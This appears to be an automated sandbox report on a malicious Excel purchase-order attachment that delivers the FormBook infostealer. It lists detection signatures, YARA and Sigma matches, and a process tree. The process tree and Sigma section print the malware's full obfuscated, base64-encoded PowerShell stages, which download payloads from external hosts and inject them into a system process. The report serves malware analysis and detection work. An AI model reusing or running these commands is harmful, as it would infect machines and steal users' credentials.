Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#BBGR2411PO69.xls

Overview

General Information

Sample name:PO#BBGR2411PO69.xls
Analysis ID:1566415
MD5:ff6ca372d80251aeadd10122ac4d46c0
SHA1:26543f78c7c1bfad35c0e3e2acb9d5972cbd1257
SHA256:8bd6a8555939af5f504e3bcadfa876e1447cadbcbd163b340cd784cafd4dfd8c
Tags:xlsuser-abuse_ch
Infos:

Detection

FormBook, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3392 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3684 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3824 cmdline: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3848 cmdline: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3940 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3948 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4052 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_compiler.exe (PID: 3568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
    • mshta.exe (PID: 1520 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 2592 cmdline: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 1972 cmdline: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 2848 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2216 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2220 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_compiler.exe (PID: 3744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13fdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Process Memory Space: powershell.exe PID: 3108JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          27.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            27.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e403:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            27.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              27.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = 